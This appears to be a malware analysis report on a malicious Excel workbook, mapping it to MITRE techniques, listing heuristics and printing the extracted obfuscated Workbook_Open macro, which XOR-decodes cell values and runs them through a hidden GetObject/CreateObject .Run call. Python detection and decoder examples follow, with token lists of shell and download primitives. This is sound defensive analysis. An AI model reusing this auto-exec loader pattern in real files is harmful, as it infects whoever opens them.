Verdict: MALICIOUS
Risk score: 148
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1059 Command and Scripting Interpreter
- T1203 Exploitation for Client Execution
The sample is an Excel workbook whose ThisWorkbook module carries a Workbook_Open macro, so the code runs as soon as macros are enabled. The macro is lightly obfuscated (GoTo spaghetti, meaningless identifiers, arithmetic in place of literal constants), but its structure is simple. Berkeley turns a hex string into a byte array by prefixing each pair of characters with "&H" (its two Chr() expressions evaluate to "&" and "H") and letting VBA coerce the result to a Byte. Liver XORs each of those bytes with the ASCII code of the key character at position (index mod 10) of the ten-character key "f5f2b37dc7" and rebuilds the plaintext with Chr(). Neither function downloads or executes anything; they are only the string decoder. Workbook_Open decodes five cells of the sheet "wfe5" (H114, G172, J159, E148, E146) and passes them to Hospitality, which executes GetObject(Karen).CreateObject(Repeated).Run Pentium & " " & Steam & Potentially, 0: a moniker for GetObject, a ProgID for CreateObject, and a command line with its arguments; the trailing 0 is the Run method's window-style argument on WScript.Shell, the object this call shape normally targets, and hides the window. The decoded cell values are not part of this report, so the exact moniker, ProgID and command line cannot be confirmed from the macro text alone. The GetObject/CreateObject/.Run chain inside an auto-exec macro is nonetheless a standard loader pattern, consistent with the analyzer's assessment that the document is designed to fetch and run a second-stage payload.
Heuristics (5)

- VBA macros detected (medium; 4 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code.
- CreateObject call (high) [OLE_VBA_CREATEOBJ]: CreateObject call. Matched line in script:
  GetObject(Karen).CreateObject(Repeated).Run Pentium & " " & Steam & Potentially, 0
- GetObject call (high) [OLE_VBA_GETOBJ]: GetObject call. Matched line in script:
  GetObject(Karen).CreateObject(Repeated).Run Pentium & " " & Steam & Potentially, 0
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) and a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line.
- Workbook_Open macro (low) [OLE_VBA_WBOPEN]: Workbook_Open macro. Matched line in script:
  Sub Workbook_Open()
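The pairing rule behind OLE_VBA_PCODE_AUTOEXEC_EXEC is easy to reproduce at source level. The Python below is an added example, not the analyzer's own implementation: it applies the two token lists from the heuristic description to each module of olevba-style output (modules are split on their Attribute VB_Name header line) and fires only when an auto-exec entry point and an execution token occur in the same module. The real heuristic runs on compiled p-code/cache streams where source may be unavailable; the three sample modules embedded here are constructed so that one fires and two, each carrying only one half of the pair, do not.

```python
import re

# Token lists as the heuristic description gives them. The analyzer's real rule
# runs on compiled p-code/cache streams; this is a source-text approximation.
AUTOEXEC_ENTRY_POINTS = (
    "Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open", "Auto_Close", "AutoClose",
)
EXECUTION_TOKENS = (
    "Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe", "URLDownloadToFile",
    "WinHttp", "XMLHTTP", "ADODB.Stream", "ShellExecute", "ExecuteExcel4Macro",
)

# olevba prints one 'Attribute VB_Name = "..."' header per module; split on it so the
# co-occurrence test is evaluated per module, as the heuristic does per stream.
_MODULE_HEADER = re.compile(r'(?m)^Attribute VB_Name = "([^"]+)"[ \t]*$')


def split_modules(vba_source: str) -> list[tuple[str, str]]:
    """Return (module_name, module_text) pairs from concatenated olevba output."""
    parts = _MODULE_HEADER.split(vba_source)  # [preamble, name1, body1, name2, body2, ...]
    return [(parts[i], parts[i + 1]) for i in range(1, len(parts), 2)]


def _present(tokens, text: str) -> list[str]:
    """Case-insensitive whole-token search: 'Shell' must not match 'ShellExecute' or 'PowerShell'."""
    found = []
    for tok in tokens:
        if re.search(r"(?<!\w)" + re.escape(tok) + r"(?!\w)", text, re.IGNORECASE):
            found.append(tok)
    return sorted(found)


def pcode_autoexec_exec(vba_source: str) -> list[dict]:
    """Evaluate the pairing rule per module: a module fires only when BOTH classes occur."""
    findings = []
    for name, body in split_modules(vba_source):
        autoexec = _present(AUTOEXEC_ENTRY_POINTS, body)
        execution = _present(EXECUTION_TOKENS, body)
        findings.append({
            "module": name,
            "autoexec": autoexec,
            "exec": execution,
            "fires": bool(autoexec and execution),
        })
    return findings


# Constructed sample modules (not from the analysed document): one true positive
# and two modules that carry only one half of the pair and must not fire.
SAMPLE_VBA = '''Attribute VB_Name = "ThisWorkbook"
Sub Workbook_Open()
    GetObject(a).CreateObject(b).Run c, 0
End Sub
Attribute VB_Name = "Module1"
Sub Auto_Open()
    MsgBox "entry point, but no execution token"
End Sub
Attribute VB_Name = "Module2"
Private Sub Helper()
    Set fso = CreateObject("Scripting.FileSystemObject")
End Sub
'''

if __name__ == "__main__":
    for f in pcode_autoexec_exec(SAMPLE_VBA):
        print(f"{f['module']:13} fires={f['fires']!s:5} autoexec={f['autoexec']} exec={f['exec']}")
```

Run against the macros.bas extracted below, the rule fires on ThisWorkbook (Workbook_Open with CreateObject and GetObject) and stays silent on the empty Sheet1 module, matching the three related findings the report lists.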
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4194 bytes | 73c7b96972c08461a2b3ab2971b2e00135d69a49c5fffee6f6a3afb8f5914464 |

Preview (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Function Liver(ByVal SunSet As String) As Variant
Dim Attempts As Long: Attempts = 0: Dim Fotos() As Byte
Dim Voters() As Byte, Brush As String, Faced As Integer, Charlie As Integer, Continental As Integer
Voters = "f5f2b37dc7"
GoTo Nurses
Assess:
If Attempts < UBound(Fotos) Then
Faced = Attempts Mod (10)
Continental = Voters(Faced * 2)
Charlie = Fotos(Attempts)
GoTo Renewal
Monkey:
Brush = Brush & Chr(Fotos(Attempts))
Attempts = Attempts + 1
GoTo Assess
Else
GoTo Literary
End If
Literary:
Liver = Brush
Exit Function
Nurses:
Fotos = Berkeley(SunSet)
GoTo Assess
Renewal:
Fotos(Attempts) = Abs(Charlie Xor Continental)
GoTo Monkey
End Function
Private Sub Hospitality(ByVal Karen As String, ByVal Potentially As String, ByVal Pentium As String, ByVal Repeated As String, ByVal Steam As String)
GetObject(Karen).CreateObject(Repeated).Run Pentium & " " & Steam & Potentially, 0
End Sub
Sub Workbook_Open()
Hospitality Liver(Sheets("wfe5").Range("H114").Value), Liver(Sheets("wfe5").Range("G172").Value), Liver(Sheets("wfe5").Range("J159").Value), Liver(Sheets("wfe5").Range("E148").Value), Liver(Sheets("wfe5").Range("E146").Value)
End Sub
Private Function Berkeley(ByVal Builders As String) As Variant
Dim Brush() As Byte, i As Long, Faced As Integer, OrganizatiOnal As Integer
OrganizatiOnal = Len(Builders) / 2: i = 0: ReDim Brush(0 To OrganizatiOnal) As Byte
Continental:
If i < Len(Builders) Then
Faced = Faced + 1
Brush(Faced - 1) = Chr((7 * 2) + (((10 - 4) * 2) * 2)) & Chr((((16 / 2) * 2) + (4 * 5)) * 2) & Mid(Builders, i + 1, 2)
i = i + 2
GoTo Continental
Else
GoTo Astronomy
Dim Renewal As String
Renewal = InputBox("celp lape")
End If
Astronomy:
Berkeley = Brush
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
```
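To recover the strings Workbook_Open feeds to Hospitality without enabling macros, the decoder can be reimplemented from the Berkeley and Liver functions above. The Python below is an added example, not code from the sample or from the report: berkeley() and liver() mirror the two VBA routines (hex pairs to bytes, then XOR with the repeating key f5f2b37dc7 and Chr()), and reconstruct_command() maps the five cell references to the parameter names of Hospitality and assembles the command line the way the .Run call concatenates it. The values in SAMPLE_CELLS are constructed placeholders produced with encode(); the real cell contents are not in this report and would have to be read from sheet wfe5 (for example with openpyxl) and passed in place of SAMPLE_CELLS.

```python
# Repeating XOR key taken from the macro ("Voters"). When VBA assigns a String to a
# Byte() array it stores UTF-16LE, and Voters(Faced * 2) reads the low byte, i.e.
# the ASCII code of each key character, so a plain ASCII byte string is equivalent.
KEY = b"f5f2b37dc7"

# Cell references read by Workbook_Open, mapped to the parameter each one becomes
# in Hospitality (order of the call: H114, G172, J159, E148, E146).
CELL_PARAMS = {
    "H114": "Karen",        # moniker passed to GetObject
    "G172": "Potentially",  # appended directly after Steam in the argument string
    "J159": "Pentium",      # first token of the command line
    "E148": "Repeated",     # ProgID passed to CreateObject
    "E146": "Steam",        # second token of the command line
}


def berkeley(hex_text: str) -> bytes:
    """Port of Berkeley(): "&H" + two hex characters per byte -> byte array.

    The VBA builds "&Hxx" strings and lets the Byte assignment coerce them;
    int(pair, 16) is the same conversion. Odd-length input is rejected here
    rather than reproducing VBA's silent truncation of the last nibble.
    """
    if len(hex_text) % 2:
        raise ValueError("expected an even number of hex digits")
    return bytes(int(hex_text[i:i + 2], 16) for i in range(0, len(hex_text), 2))


def liver(hex_text: str, key: bytes = KEY) -> str:
    """Port of Liver(): hex-decode, XOR with the 10-byte repeating key, Chr() each byte."""
    raw = berkeley(hex_text)
    # chr() is Unicode where VBA's Chr() is code-page based; identical for ASCII output.
    return "".join(chr(b ^ key[i % len(key)]) for i, b in enumerate(raw))


def encode(plain: str, key: bytes = KEY) -> str:
    """Inverse of liver(); used only to build constructed test input."""
    return "".join(f"{ord(c) ^ key[i % len(key)]:02x}" for i, c in enumerate(plain))


def reconstruct_command(cells: dict[str, str]) -> dict[str, str]:
    """Decode the five cells and assemble what Hospitality() would execute:
    GetObject(Karen).CreateObject(Repeated).Run Pentium & " " & Steam & Potentially, 0
    """
    decoded = {CELL_PARAMS[ref]: liver(value) for ref, value in cells.items()}
    decoded["command_line"] = f'{decoded["Pentium"]} {decoded["Steam"]}{decoded["Potentially"]}'
    return decoded


# Constructed placeholder cell contents (hypothetical; not values from the real sample).
SAMPLE_CELLS = {
    "H114": encode("EXAMPLE_MONIKER"),
    "G172": encode(" /arg"),
    "J159": encode("example.exe"),
    "E148": encode("Example.ProgID"),
    "E146": encode("/flag"),
}

if __name__ == "__main__":
    for name, value in reconstruct_command(SAMPLE_CELLS).items():
        print(f"{name:13} {value}")
```

Because the key and the decoding algorithm live in the macro while the ciphertext lives in worksheet cells, static macro extraction alone never yields the command line; the cell values have to be pulled from the workbook and run through this decoder before the moniker, ProgID and payload location can be confirmed.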